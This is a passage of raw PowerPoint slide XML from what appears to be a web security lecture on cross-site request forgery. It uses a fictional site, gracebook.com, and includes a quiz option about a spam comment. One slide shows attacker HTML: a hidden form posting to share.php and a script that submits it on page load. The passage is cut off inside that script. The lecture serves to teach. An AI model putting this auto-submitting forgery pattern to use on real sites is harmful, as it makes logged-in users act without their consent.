              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>posted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user’s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>share</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>feed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>currently</a:t>
            </a:r>
            <a:endParaRPr sz="2667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833120" y="5170423"/>
            <a:ext cx="4023360" cy="414867"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3017520" h="311150">
                <a:moveTo>
                  <a:pt x="3017520" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2959608" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2906268" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1321308" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="310896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1321308" y="310896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2906268" y="310896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2959608" y="310896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3017520" y="310896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3017520" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206586" y="5098878"/>
            <a:ext cx="11312313" cy="916619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="56727" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="626518">
              <a:spcBef>
                <a:spcPts val="447"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>logged</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-60" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>gracebook.com</a:t>
            </a:r>
            <a:endParaRPr sz="2667" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="327"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="625671" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>c)	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>spam</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>comment</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> will</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> posted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user’s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>share</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>feed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>gracebook.com</a:t>
            </a:r>
            <a:endParaRPr sz="2667" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 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6664" y="450638"/>
            <a:ext cx="3601720" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-87" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-47" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2013713" y="3573271"/>
            <a:ext cx="6191673" cy="307339"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4643755" h="230505">
                <a:moveTo>
                  <a:pt x="4643628" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4643628" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="230124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4643628" y="230124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4643628" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="F1F4FF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1397414"/>
            <a:ext cx="14020800" cy="2116691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="99907" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="474121" marR="6773" indent="-457189">
              <a:lnSpc>
                <a:spcPts val="3520"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="787"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="13" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-27" dirty="0"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-27" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-13" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="7" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>creates </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-13" dirty="0"/>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="7" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-13" dirty="0"/>
              <a:t>containing</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-707" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-13" dirty="0"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t> HTML:</a:t>
            </a:r>
            <a:endParaRPr sz="2667" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121">
              <a:lnSpc>
                <a:spcPts val="2140"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;form</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>"http://ww</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>.gracebook.com/share.php</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="87" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"post"</a:t>
            </a:r>
            <a:endParaRPr sz="2133" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121">
              <a:lnSpc>
                <a:spcPts val="2433"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"f"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2133" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="504601">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="253"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"hidden"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"text"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"SPAM</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>COMMENT"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;&lt;/input&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2133" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="504601">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'f'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>submit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
